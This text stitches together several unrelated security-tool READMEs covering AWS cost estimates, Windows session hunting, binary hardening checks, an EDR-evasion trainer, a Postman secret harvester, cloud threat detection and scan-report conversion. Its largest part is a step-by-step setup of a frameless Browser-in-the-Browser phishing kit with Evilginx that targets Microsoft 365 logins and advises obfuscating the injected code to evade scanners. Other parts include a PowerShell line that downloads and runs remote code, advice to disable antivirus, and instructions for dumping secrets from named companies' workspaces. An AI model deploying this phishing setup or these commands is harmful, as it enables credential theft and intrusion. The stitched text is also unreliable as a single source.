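aws logs tail /aws/guardduty/malware-scan-events --follow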
Run the following commands in your terminal:
cdk destroy --all
(Optional) Delete the CloudWatch log groups associated with Lambda Functions.
For the purpose of this analysis, we have assumed a fictitious scenario to take as an example. The following cost estimates are based on services located in the North Virginia (us-east-1) region.
Monthly Cost | Total Cost for 12 Months |
---|---|
171.22 USD | 2,054.74 USD |
Service Name | Description | Monthly Cost (USD) |
---|---|---|
AWS Elastic Disaster Recovery | 2 Source Servers / 1 Replication Server / 4 disks / 100GB / 30 days of EBS Snapshot Retention Period | 71.41 |
Amazon GuardDuty | 3 TB Malware Scanned/Month | 94.56 |
Amazon DynamoDB | 100MB 1 Read/Second 1 Writes/Second | 3.65 |
AWS Security Hub | 1 Account / 100 Security Checks / 1000 Finding Ingested | 0.10 |
AWS EventBridge | 1M custom events | 1.00 |
Amazon Cloudwatch | 1GB ingested/month | 0.50 |
AWS Lambda | 5 ARM Lambda Functions - 128MB / 10secs | 0.00 |
Amazon SQS | 2 SQS Fifo | 0.00 |
Total | | 171.22 |
Note: The figures presented here are estimates based on the assumptions described above, derived from the AWS Pricing Calculator. For further details please check this pricing calculator as a reference. You can adjust the services configuration in the referenced calculator to make your own estimation. This estimation does not include potential taxes or additional charges that might be applicable. It's crucial to remember that actual fees can vary based on usage and any additional services not covered in this analysis. For critical environments it is advisable to include a Business Support Plan (not considered in the estimation).
See CONTRIBUTING for more information.
Retrieve and display information about active user sessions on remote computers. No admin privileges required.
The tool leverages the remote registry service to query the HKEY_USERS registry hive on the remote computers. It identifies and extracts Security Identifiers (SIDs) associated with active user sessions, and translates these into corresponding usernames, offering insights into who is currently logged in.
If the -CheckAsAdmin switch is provided, it will gather sessions by authenticating to targets where you have local admin access using Invoke-WMIRemoting (which most likely will retrieve more results).
It's important to note that the remote registry service needs to be running on the remote computer for the tool to work effectively. In my tests, if the service is stopped but its Startup type is configured to "Automatic" or "Manual", the service will start automatically on the target computer once queried (this is native behavior), and sessions information will be retrieved. If set to "Disabled" no session information can be retrieved from the target.
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Invoke-SessionHunter/main/Invoke-SessionHunter.ps1')
If run without parameters or switches it will retrieve active sessions for all computers in the current domain by querying the registry
Invoke-SessionHunter
Gather sessions by authenticating to targets where you have local admin access
Invoke-SessionHunter -CheckAsAdmin
You can optionally provide credentials in the following format
Invoke-SessionHunter -CheckAsAdmin -UserName "ferrari\Administrator" -Password "P@ssw0rd!"
You can also use the -FailSafe switch, which will direct the tool to proceed if the target's remote registry becomes unresponsive. This works in combination with -Timeout (default = 2; increase for slower networks).
Invoke-SessionHunter -FailSafe
Invoke-SessionHunter -FailSafe -Timeout 5
Use the -Match switch to show only targets where you have admin access and a privileged user is logged in
Invoke-SessionHunter -Match
All switches can be combined
Invoke-SessionHunter -CheckAsAdmin -UserName "ferrari\Administrator" -Password "P@ssw0rd!" -FailSafe -Timeout 5 -Match
Invoke-SessionHunter -Domain contoso.local
Invoke-SessionHunter -Targets "DC01,Workstation01.contoso.local"
Invoke-SessionHunter -Targets c:\Users\Public\Documents\targets.txt
Invoke-SessionHunter -Servers
Invoke-SessionHunter -Workstations
Invoke-SessionHunter -Hunt "Administrator"
Invoke-SessionHunter -IncludeLocalHost
Invoke-SessionHunter -RawResults
Note: if a host is not reachable it will hang for a while
Invoke-SessionHunter -NoPortScan
HardeningMeter is an open-source Python tool carefully designed to comprehensively assess the security hardening of binaries and systems. Its robust capabilities include thorough checks of various binary exploitation protection mechanisms, including Stack Canary, RELRO, randomizations (ASLR, PIC, PIE), non-executable stack, Fortify, ASAN, and the NX bit. This tool is suitable for all types of binaries and provides accurate information about the hardening status of each binary, identifying those that deserve attention and those with robust security measures. HardeningMeter supports all Linux distributions and machine-readable output: the results can be printed to the screen in a table format or exported to a CSV file. (For more information see the Documentation.md file)
Scan the '/usr/bin' directory, the '/usr/sbin/newusers' file, the system and export the results to a csv file.
python3 HardeningMeter.py -f /bin/cp -s
Before installing HardeningMeter, make sure your machine has the following:
1. The readelf and file commands
2. Python version 3
3. pip
4. tabulate
pip install tabulate
The very latest developments can be obtained via git.
Clone or download the project files (no compilation nor installation is required)
git clone https://github.com/OfriOuzan/HardeningMeter
Specify the files you want to scan; the argument can take more than one file, separated by spaces.
Specify the directory you want to scan; the argument takes one directory and scans all ELF files in it recursively.
Specify whether you want to add external checks (False by default).
Prints, in order, only those files that are missing security hardening mechanisms and need extra attention.
Specify if you want to scan the system hardening methods.
Specify if you want to save the results to csv file (results are printed as a table to stdout by default).
HardeningMeter's results are printed as a table and consist of 3 different states:
- (X) - indicates that the binary hardening mechanism is disabled.
- (V) - indicates that the binary hardening mechanism is enabled.
- (-) - indicates that the binary hardening mechanism is not relevant in this particular case.

When the default language on Linux is not English, make sure to add "LC_ALL=C" before calling the script.
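Putting that note together with the earlier example, a run on a non-English system would look like this:
# Force the C locale as advised above, then scan /bin/cp and the system
LC_ALL=C python3 HardeningMeter.py -f /bin/cp -s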
CrimsonEDR is an open-source project engineered to identify specific malware patterns, offering a tool for honing skills in circumventing Endpoint Detection and Response (EDR). By leveraging diverse detection methods, it empowers users to deepen their understanding of security evasion tactics.
Detection | Description |
---|---|
Direct Syscall | Detects the usage of direct system calls, often employed by malware to bypass traditional API hooks. |
NTDLL Unhooking | Identifies attempts to unhook functions within the NTDLL library, a common evasion technique. |
AMSI Patch | Detects modifications to the Anti-Malware Scan Interface (AMSI) through byte-level analysis. |
ETW Patch | Detects byte-level alterations to Event Tracing for Windows (ETW), commonly manipulated by malware to evade detection. |
PE Stomping | Identifies instances of PE (Portable Executable) stomping. |
Reflective PE Loading | Detects the reflective loading of PE files, a technique employed by malware to avoid static analysis. |
Unbacked Thread Origin | Identifies threads originating from unbacked memory regions, often indicative of malicious activity. |
Unbacked Thread Start Address | Detects threads with start addresses pointing to unbacked memory, a potential sign of code injection. |
API hooking | Places a hook on the NtWriteVirtualMemory function to monitor memory modifications. |
Custom Pattern Search | Allows users to search for specific patterns provided in a JSON file, facilitating the identification of known malware signatures. |
To get started with CrimsonEDR, follow these steps:
sudo apt-get install gcc-mingw-w64-x86-64
git clone https://github.com/Helixo32/CrimsonEDR
cd CrimsonEDR; chmod +x compile.sh; ./compile.sh
Windows Defender and other antivirus programs may flag the DLL as malicious due to its content containing bytes used to verify if the AMSI has been patched. Please ensure to whitelist the DLL or disable your antivirus temporarily when using CrimsonEDR to avoid any interruptions.
To use CrimsonEDR, follow these steps:
Ensure that the ioc.json file is placed in the current directory from which the executable being monitored is launched. For example, if you launch your executable to monitor from C:\Users\admin\, the DLL will look for ioc.json in C:\Users\admin\ioc.json. Currently, ioc.json contains patterns related to msfvenom. You can easily add your own in the following format:
{
"IOC": [
["0x03", "0x4c", "0x24", "0x08", "0x45", "0x39", "0xd1", "0x75"],
["0xf1", "0x4c", "0x03", "0x4c", "0x24", "0x08", "0x45", "0x39"],
["0x58", "0x44", "0x8b", "0x40", "0x24", "0x49", "0x01", "0xd0"],
["0x66", "0x41", "0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40"],
["0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40", "0x1c", "0x49"],
["0x01", "0xc1", "0x38", "0xe0", "0x75", "0xf1", "0x4c", "0x03"],
["0x24", "0x49", "0x01", "0xd0", "0x66", "0x41", "0x8b", "0x0c"],
["0xe8", "0xcc", "0x00", "0x00", "0x00", "0x41", "0x51", "0x41"]
]
}
Execute CrimsonEDRPanel.exe with the following arguments:
- -d <path_to_dll>: Specifies the path to the CrimsonEDR.dll file.
- -p <process_id>: Specifies the Process ID (PID) of the target process where you want to inject the DLL.
For example:
.\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234
A new approach to Browser In The Browser (BITB) without the use of iframes, allowing the bypass of traditional framebusters implemented by login pages like Microsoft.
This POC code is built for using this new BITB with Evilginx, and a Microsoft Enterprise phishlet.
Before diving deep into this, I recommend that you first check my talk at BSides 2023, where I first introduced this concept along with important details on how to craft the "perfect" phishing attack. ▶ Watch Video
☕ Buy Me A Coffee
This tool is for educational and research purposes only. It demonstrates a non-iframe based Browser In The Browser (BITB) method. The author is not responsible for any misuse. Use this tool only legally and ethically, in controlled environments for cybersecurity defense testing. By using this tool, you agree to do so responsibly and at your own risk.
Over the past year, I've been experimenting with different tricks to craft the "perfect" phishing attack. The typical "red flags" people are trained to look for are things like urgency, threats, authority, poor grammar, etc. The next best thing people nowadays check is the link/URL of the website they are interacting with, and they tend to get very conscious the moment they are asked to enter sensitive credentials like emails and passwords.
That's where Browser In The Browser (BITB) came into play. Originally introduced by @mrd0x, BITB is a concept of creating the appearance of a believable browser window inside of which the attacker controls the content (by serving the malicious website inside an iframe). However, the fake URL bar of the fake browser window is set to the legitimate site the user would expect. This combined with a tool like Evilginx becomes the perfect recipe for a believable phishing attack.
The problem is that over the past months/years, major websites like Microsoft implemented various little tricks called "framebusters/framekillers" which mainly attempt to break iframes that might be used to serve the proxied website like in the case of Evilginx.
In short, Evilginx + BITB for websites like Microsoft no longer works. At least not with a BITB that relies on iframes.
A Browser In The Browser (BITB) without any iframes! As simple as that.
Meaning that we can now use BITB with Evilginx on websites like Microsoft.
Evilginx here is just a strong example, but the same concept can be used for other use-cases as well.
Framebusters target iframes specifically, so the idea is to create the BITB effect without the use of iframes, and without disrupting the original structure/content of the proxied page. This can be achieved by injecting scripts and HTML besides the original content using search and replace (aka substitutions), then relying completely on HTML/CSS/JS tricks to make the visual effect. We also use an additional trick called "Shadow DOM" in HTML to place the content of the landing page (background) in such a way that it does not interfere with the proxied content, allowing us to flexibly use any landing page with minor additional JS scripts.
Create a local Linux VM. (I personally use Ubuntu 22 on VMWare Player or Parallels Desktop)
Update and Upgrade system packages:
sudo apt update && sudo apt upgrade -y
Create a new evilginx user, and add user to sudo group:
sudo su
adduser evilginx
usermod -aG sudo evilginx
Test that evilginx user is in sudo group:
su - evilginx
sudo ls -la /root
Navigate to users home dir:
cd /home/evilginx
(You can do everything as sudo user as well since we're running everything locally)
Download and build Evilginx: Official Docs
Copy Evilginx files to /home/evilginx
Install Go: Official Docs
wget https://go.dev/dl/go1.21.4.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.4.linux-amd64.tar.gz
nano ~/.profile
ADD: export PATH=$PATH:/usr/local/go/bin
source ~/.profile
Check:
go version
Install make:
sudo apt install make
Build Evilginx:
cd /home/evilginx/evilginx2
make
Create a new directory for our evilginx build along with phishlets and redirectors:
mkdir /home/evilginx/evilginx
Copy build, phishlets, and redirectors:
cp /home/evilginx/evilginx2/build/evilginx /home/evilginx/evilginx/evilginx
cp -r /home/evilginx/evilginx2/redirectors /home/evilginx/evilginx/redirectors
cp -r /home/evilginx/evilginx2/phishlets /home/evilginx/evilginx/phishlets
Ubuntu firewall quick fix (thanks to @kgretzky)
sudo setcap CAP_NET_BIND_SERVICE=+eip /home/evilginx/evilginx/evilginx
On Ubuntu, if you get a Failed to start nameserver on: :53 error, try modifying this file:
sudo nano /etc/systemd/resolved.conf
Edit/add the DNSStubListener setting to no:
DNSStubListener=no
then
sudo systemctl restart systemd-resolved
Since we will be using Apache2 in front of Evilginx, we need to make Evilginx listen to a different port than 443.
nano ~/.evilginx/config.json
CHANGE https_port from 443 to 8443
Install Apache2:
sudo apt install apache2 -y
Enable Apache2 mods that will be used: (We are also disabling access_compat module as it sometimes causes issues)
sudo a2enmod proxy
sudo a2enmod proxy_http
sudo a2enmod proxy_balancer
sudo a2enmod lbmethod_byrequests
sudo a2enmod env
sudo a2enmod include
sudo a2enmod setenvif
sudo a2enmod ssl
sudo a2ensite default-ssl
sudo a2enmod cache
sudo a2enmod substitute
sudo a2enmod headers
sudo a2enmod rewrite
sudo a2dismod access_compat
Start and enable Apache:
sudo systemctl start apache2
sudo systemctl enable apache2
Check that Apache and VM networking work by visiting the VM's IP from a browser on the host machine.
Install git if not already available:
sudo apt -y install git
Clone this repo:
git clone https://github.com/waelmas/frameless-bitb
cd frameless-bitb
Make directories for the pages we will be serving:
sudo mkdir /var/www/home
sudo mkdir /var/www/primary
sudo mkdir /var/www/secondary
Copy the directories for each page:
sudo cp -r ./pages/home/ /var/www/
sudo cp -r ./pages/primary/ /var/www/
sudo cp -r ./pages/secondary/ /var/www/
Optional: Remove the default Apache page (not used):
sudo rm -r /var/www/html/
Copy the O365 phishlet to phishlets directory:
sudo cp ./O365.yaml /home/evilginx/evilginx/phishlets/O365.yaml
Optional: To set the Calendly widget to use your account instead of the default I have inside, go to pages/primary/script.js and change the CALENDLY_PAGE_NAME and CALENDLY_EVENT_TYPE.
Note on Demo Obfuscation: As I explain in the walkthrough video, I included a minimal obfuscation for text content like URLs and titles of the BITB. You can open the demo obfuscator by opening demo-obfuscator.html in your browser. In a real-world scenario, I would highly recommend that you obfuscate larger chunks of the HTML code injected or use JS tricks to avoid being detected and flagged. The advanced version I am working on will use a combination of advanced tricks to make it nearly impossible for scanners to fingerprint/detect the BITB code, so stay tuned.
Since we are running everything locally, we need to generate self-signed SSL certificates that will be used by Apache. Evilginx will not need the certs as we will be running it in developer mode.
We will use the domain fake.com, which will point to our local VM. If you want to use a different domain, make sure to change the domain in all files (Apache conf files, JS files, etc.).
Create dir and parents if they do not exist:
sudo mkdir -p /etc/ssl/localcerts/fake.com/
Generate the SSL certs using the OpenSSL config file:
sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
-keyout /etc/ssl/localcerts/fake.com/privkey.pem -out /etc/ssl/localcerts/fake.com/fullchain.pem \
-config openssl-local.cnf
Modify private key permissions:
sudo chmod 600 /etc/ssl/localcerts/fake.com/privkey.pem
Copy custom substitution files (the core of our approach):
sudo cp -r ./custom-subs /etc/apache2/custom-subs
Important Note: In this repo I have included 2 substitution configs for Chrome on Mac and Chrome on Windows BITB. Both have auto-detection and styling for light/dark mode and they should act as base templates to achieve the same for other browser/OS combos. Since I did not include automatic detection of the browser/OS combo used to visit our phishing page, you will have to use one of two or implement your own logic for automatic switching.
Both config files under /apache-configs/ are the same, only with a different Include directive used for the substitution file that will be included. (There are 2 references to each file.)
# Uncomment the one you want and remember to restart Apache after any changes:
#Include /etc/apache2/custom-subs/win-chrome.conf
Include /etc/apache2/custom-subs/mac-chrome.conf
To make it easier, I included both versions as separate files for this next step.
Windows/Chrome BITB:
sudo cp ./apache-configs/win-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf
Mac/Chrome BITB:
sudo cp ./apache-configs/mac-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf
Test Apache configs to ensure there are no errors:
sudo apache2ctl configtest
Restart Apache to apply changes:
sudo systemctl restart apache2
Get the IP of the VM using ifconfig and note it somewhere for the next step.
We now need to add new entries to our hosts file to point the domain used in this demo, fake.com, and all used subdomains to the VM on which Apache and Evilginx are running.
On Windows:
Open Notepad as Administrator (Search > Notepad > Right-Click > Run as Administrator)
Click on the File option (top-left) and, in the File Explorer address bar, paste the following:
C:\Windows\System32\drivers\etc\
Change the file types (bottom-right) to "All files".
Double-click the file named hosts
On Mac:
Open a terminal and run the following:
sudo nano /private/etc/hosts
Now modify the following records (replace [IP] with the IP of your VM), then paste the records at the end of the hosts file:
# Local Apache and Evilginx Setup
[IP] login.fake.com
[IP] account.fake.com
[IP] sso.fake.com
[IP] www.fake.com
[IP] portal.fake.com
[IP] fake.com
# End of section
Save and exit.
Now restart your browser before moving to the next step.
Note: On Mac, use the following command to flush the DNS cache:
sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder
This demo is made with the provided Office 365 Enterprise phishlet. To get the host entries you need to add for a different phishlet, use phishlet get-hosts [PHISHLET_NAME], but remember to replace the 127.0.0.1 with the actual local IP of your VM.
Since we are using self-signed SSL certificates, our browser will warn us every time we try to visit fake.com, so we need to make our host machine trust the certificate authority that signed the SSL certs.
For this step, it's easier to follow the video instructions, but here is the gist anyway.
Open https://fake.com/ in your Chrome browser.
Ignore the Unsafe Site warning and proceed to the page.
Click the SSL icon > Details > Export Certificate. IMPORTANT: When saving, the name MUST end with .crt for Windows to open it correctly.
Double-click it > install for current user. Do NOT select automatic; instead, place the certificate in a specific store: select "Trusted Root Certification Authorities".
On Mac: to install for the current user only, select "Keychain: login" AND click on "View Certificates" > Details > Trust > Always Trust.
Now RESTART your Browser
You should now be able to visit https://fake.com and see the homepage without any SSL warnings.
At this point, everything should be ready so we can go ahead and start Evilginx, set up the phishlet, create our lure, and test it.
Optional: Install tmux (to keep evilginx running even if the terminal session is closed. Mainly useful when running on remote VM.)
sudo apt install tmux -y
Start Evilginx in developer mode (using tmux to avoid losing the session):
tmux new-session -s evilginx
cd ~/evilginx/
./evilginx -developer
(To re-attach to the tmux session, use tmux attach-session -t evilginx)
Evilginx Config:
config domain fake.com
config ipv4 127.0.0.1
IMPORTANT: Set Evilginx Blacklist mode to NoAdd to avoid blacklisting Apache since all requests will be coming from Apache and not the actual visitor IP.
blacklist noadd
Setup Phishlet and Lure:
phishlets hostname O365 fake.com
phishlets enable O365
lures create O365
lures get-url 0
Copy the lure URL and visit it from your browser (use Guest user on Chrome to avoid having to delete all saved/cached data between tests).
Original iframe-based BITB by @mrd0x: https://github.com/mrd0x/BITB
Evilginx Mastery Course by the creator of Evilginx @kgretzky: https://academy.breakdev.org/evilginx-mastery
My talk at BSides 2023: https://www.youtube.com/watch?v=p1opa2wnRvg
How to protect Evilginx using Cloudflare and HTML Obfuscation: https://www.jackphilipbutton.com/post/how-to-protect-evilginx-using-cloudflare-and-html-obfuscation
Evilginx resources for Microsoft 365 by @BakkerJan: https://janbakker.tech/evilginx-resources-for-microsoft-365/
Porch Pirate started as a tool to quickly uncover Postman secrets, and has slowly begun to evolve into a multi-purpose reconnaissance / OSINT framework for Postman. While existing tools are great proof of concepts, they only attempt to identify very specific keywords as "secrets", and in very limited locations, with no consideration to recon beyond secrets. We realized we required capabilities that were "secret-agnostic", and had enough flexibility to capture false-positives that still provided offensive value.
Porch Pirate enumerates and presents sensitive results (global secrets, unique headers, endpoints, query parameters, authorization, etc.) from publicly accessible Postman entities such as collections, workspaces, and users. Install it with pip:
python3 -m pip install porch-pirate
The Porch Pirate client can be used to nearly fully conduct reviews on public Postman entities in a quick and simple fashion. There are intended workflows and particular keywords to be used that can typically maximize results. These methodologies can be located on our blog: Plundering Postman with Porch Pirate.
Porch Pirate supports the following arguments for operating on collections, workspaces, or users:
--globals
--collections
--requests
--urls
--dump
--raw
--curl
porch-pirate -s "coca-cola.com"
By default, Porch Pirate will display globals from all active and inactive environments if they are defined in the workspace. Provide a -w argument with the workspace ID (found by performing a simple search, or an automatic search dump) to extract the workspace's globals, along with other information.
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8
When an interesting result has been found with a simple search, we can provide the workspace ID to the -w argument with the --dump command to begin extracting information from the workspace and its collections.
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --dump
Porch Pirate can be supplied a simple search term, following the --globals argument. Porch Pirate will dump all relevant workspaces tied to the results discovered in the simple search, but only if there are globals defined. This is particularly useful for quickly identifying potentially interesting workspaces to dig into further.
porch-pirate -s "shopify" --globals
Porch Pirate can be supplied a simple search term, following the --dump argument. Porch Pirate will dump all relevant workspaces and collections tied to the results discovered in the simple search. This is particularly useful for quickly sifting through potentially interesting results.
porch-pirate -s "coca-cola.com" --dump
A particularly useful way to use Porch Pirate is to extract all URLs from a workspace and export them to another tool for fuzzing.
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --urls
Porch Pirate will recursively extract all URLs from workspaces and their collections related to a simple search term.
porch-pirate -s "coca-cola.com" --urls
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --collections
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --requests
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --raw
porch-pirate -w WORKSPACE_ID
porch-pirate -c COLLECTION_ID
porch-pirate -r REQUEST_ID
porch-pirate -u USERNAME/TEAMNAME
Porch Pirate can build curl requests when provided with a request ID for easier testing.
porch-pirate -r 11055256-b1529390-18d2-4dce-812f-ee4d33bffd38 --curl
porch-pirate -s coca-cola.com --proxy 127.0.0.1:8080
from porchpirate import porchpirate

p = porchpirate()
print(p.search('coca-cola.com'))
p = porchpirate()
print(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
import json

p = porchpirate()
collections = json.loads(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
for collection in collections['data']:
requests = collection['requests']
for r in requests:
request_data = p.request(r['id'])
print(request_data)
p = porchpirate()
print(p.workspace_globals('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
Other library usage examples can be located in the examples directory, which contains the following examples:
dump_workspace.py
format_search_results.py
format_workspace_collections.py
format_workspace_globals.py
get_collection.py
get_collections.py
get_profile.py
get_request.py
get_statistics.py
get_team.py
get_user.py
get_workspace.py
recursive_globals_from_search.py
request_to_curl.py
search.py
search_by_page.py
workspace_collections.py
Permiso: https://permiso.io
Read our release blog: https://permiso.io/blog/cloudgrappler-a-powerful-open-source-threat-detection-tool-for-cloud-environments
CloudGrappler is a purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure.
To optimize your utilization of CloudGrappler, we recommend using shorter time ranges when querying for results. This approach enhances efficiency and accelerates the retrieval of information, ensuring a more seamless experience with the tool.
pip3 install -r requirements.txt
To clone the cloudgrep repository locally, run the clone.sh file. Alternatively, you can manually clone the repository into the same directory where CloudGrappler was cloned.
chmod +x clone.sh
./clone.sh
This tool offers a CLI (Command Line Interface). As such, here we review its use:
Define the scanning scope inside the data_sources.json file based on your cloud infrastructure configuration. The following example showcases a structured data_sources.json file for both AWS and Azure environments:
Modifying the source inside the queries.json file to a wildcard character (*) will scan the corresponding query across both AWS and Azure environments.
{
"AWS": [
{
"bucket": "cloudtrail-logs-00000000-ffffff",
"prefix": [
"testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03",
"testTrails/AWSLogs/00000000/CloudTrail/us-west-1/2024/03/04"
]
},
{
"bucket": "aws-kosova-us-east-1-00000000"
}
],
"AZURE": [
{
"accountname": "logs",
"container": [
"cloudgrappler"
]
}
]
}
Run the command:
python3 main.py
python3 main.py -p
[+] Running GetFileDownloadUrls.*secrets_ for AWS
[+] Threat Actor: LUCR3
[+] Severity: MEDIUM
[+] Description: Review use of CloudShell. Permiso seldom witnesses use of CloudShell outside of known attackers. This however may be a part of your normal business use case.
python3 main.py -p -jo
reports
└── json
    ├── AWS
    │   └── 2024-03-04 01:01 AM
    │       └── cloudtrail-logs-00000000-ffffff--
    │           └── testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03
    │               └── GetFileDownloadUrls.*secrets_.json
    └── AZURE
        └── 2024-03-04 01:01 AM
            └── logs
                └── cloudgrappler
                    └── okta_key.json
python3 main.py -p -sd 2024-02-15 -ed 2024-02-16
python3 main.py -q "GetFileDownloadUrls.*secret", "UpdateAccessKey" -s '*'
python3 main.py -f new_file.json
Your system will need access to the S3 bucket. For example, if you are running on your laptop, you will need to configure the AWS CLI. If you are running on an EC2, an Instance Profile is likely the best choice.
If you run on an EC2 instance in the same region as the S3 bucket with a VPC endpoint for S3 you can avoid egress charges. You can authenticate in a number of ways.
The simplest way to authenticate with Azure is to first run:
az login
This will open a browser window and prompt you to login to Azure.
ST Smart Things Sentinel is an advanced security tool engineered specifically to scrutinize and detect threats within the intricate protocols utilized by IoT (Internet of Things) devices. In the ever-expanding landscape of connected devices, ST Smart Things Sentinel emerges as a vigilant guardian, specializing in protocol-level threat detection. This tool empowers users to proactively identify and neutralize potential security risks, ensuring the integrity and security of IoT ecosystems.
~ Hilali Abdel
USAGE
python st_tool.py [-h] [-s] [--add ADD] [--scan SCAN] [--id ID] [--search SEARCH] [--bug BUG] [--firmware FIRMWARE] [--type TYPE] [--detect] [--tty] [--uart UART] [--fz FZ]
[Add new Device]
python3 smartthings.py -a 192.168.1.1
python3 smartthings.py -s --type TPLINK
python3 smartthings.py -s --firmware "TP-Link Archer C7v2"
(The two commands above search for CVEs and PoCs by device type and firmware.)
Scan device for open UPnP ports:
python3 smartthings.py -s --scan upnp --id
Get data from MQTT (subscribe):
python3 smartthings.py -s --scan mqtt --id
This tool takes a scanning tool's output file, and converts it to a tabular format (CSV, XLSX, or text table). This tool can process output from the following tools:
This tool can offer a human-readable, tabular format which you can tie to any observations you have drafted in your report. Why? Because then your reviewers can tell that you, the pentester, investigated all found open ports, and looked at all scanning reports.
Using Pip:
pip install --user sr2t
You can use sr2t in two ways:
sr2t --help
python -m src.sr2t --help
$ sr2t --help
usage: sr2t [-h] [--nessus NESSUS [NESSUS ...]] [--nmap NMAP [NMAP ...]]
[--nikto NIKTO [NIKTO ...]] [--dirble DIRBLE [DIRBLE ...]]
[--testssl TESTSSL [TESTSSL ...]]
[--fortify FORTIFY [FORTIFY ...]] [--nmap-state NMAP_STATE]
[--nmap-services] [--no-nessus-autoclassify]
[--nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE]
[--nessus-tls-file NESSUS_TLS_FILE]
[--nessus-x509-file NESSUS_X509_FILE]
[--nessus-http-file NESSUS_HTTP_FILE]
[--nessus-smb-file NESSUS_SMB_FILE]
[--nessus-rdp-file NESSUS_RDP_FILE]
[--nessus-ssh-file NESSUS_SSH_FILE]
[--nessus-min-severity NESSUS_MIN_SEVERITY]
[--nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH]
[--nessus-sort-by NESSUS_SORT_BY]
[--nikto-description-width NIKTO_DESCRIPTION_WIDTH]
[--fortify-details] [--annotation-width ANNOTATION_WIDTH]
[-oC OUTPUT_CSV] [-oT OUTPUT_TXT] [-oX OUTPUT_XLSX]
[-oA OUTPUT_ALL]
Converting scanning reports to a tabular format
optional arguments:
-h, --help show this help message and exit
--nmap-state NMAP_STATE
Specify the desired state to filter (e.g.
open|filtered).
--nmap-services Specify to output a supplemental list of detected
services.
--no-nessus-autoclassify
Specify to not autoclassify Nessus results.
--nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE
Specify to override a custom Nessus autoclassify YAML
file.
--nessus-tls-file NESSUS_TLS_FILE
Specify to override a custom Nessus TLS findings YAML
file.
--nessus-x509-file NESSUS_X509_FILE
Specify to override a custom Nessus X.509 findings
YAML file.
--nessus-http-file NESSUS_HTTP_FILE
Specify to override a custom Nessus HTTP findings YAML
file.
--nessus-smb-file NESSUS_SMB_FILE
Specify to override a custom Nessus SMB findings YAML
file.
--nessus-rdp-file NESSUS_RDP_FILE
Specify to override a custom Nessus RDP findings YAML
file.
--nessus-ssh-file NESSUS_SSH_FILE
Specify to override a custom Nessus SSH findings YAML
file.
--nessus-min-severity NESSUS_MIN_SEVERITY
Specify the minimum severity to output (e.g. 1).
--nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH
Specify the width of the pluginid column (e.g. 30).
--nessus-sort-by NESSUS_SORT_BY
Specify to sort output by ip-address, port, plugin-id,
plugin-name or severity.
--nikto-description-width NIKTO_DESCRIPTION_WIDTH
Specify the width of the description column (e.g. 30).
--fortify-details Specify to include the Fortify abstracts, explanations
and recommendations for each vulnerability.
--annotation-width ANNOTATION_WIDTH
Specify the width of the annotation column (e.g. 30).
-oC OUTPUT_CSV, --output-csv OUTPUT_CSV
Specify the output CSV basename (e.g. output).
-oT OUTPUT_TXT, --output-txt OUTPUT_TXT
Specify the output TXT file (e.g. output.txt).
-oX OUTPUT_XLSX, --output-xlsx OUTPUT_XLSX
Specify the output XLSX file (e.g. output.xlsx). Only
for Nessus at the moment
-oA OUTPUT_ALL, --output-all OUTPUT_ALL
Specify the output basename to output to all formats
(e.g. output).
specify at least one:
--nessus NESSUS [NESSUS ...]
Specify (multiple) Nessus XML files.
--nmap NMAP [NMAP ...]
Specify (multiple) Nmap XML files.
--nikto NIKTO [NIKTO ...]
Specify (multiple) Nikto XML files.
--dirble DIRBLE [DIRBLE ...]
Specify (multiple) Dirble XML files.
--testssl TESTSSL [TESTSSL ...]
Specify (multiple) Testssl JSON files.
--fortify FORTIFY [FORTIFY ...]
Specify (multiple) HP Fortify FPR files.
A few examples
To produce an XLSX format:
$ sr2t --nessus example/nessus.nessus --no-nessus-autoclassify -oX example.xlsx
To produce a text tabular format to stdout:
$ sr2t --nessus example/nessus.nessus
+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
| host | port | plugin id | plugin name | severity | annotations |
+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
| 192.168.142.4 | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.4 | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.4 | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |
| 192.168.142.4 | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |
| 192.168.142.4 | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |
| 192.168.142.4 | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |
| 192.168.142.4 | 3389 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.4 | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.4 | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |
| 192.168.142.4 | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |
| 192.168.142.4 | 3389 | 51192 | SSL Certificate Cannot Be Trusted | 2 | X |
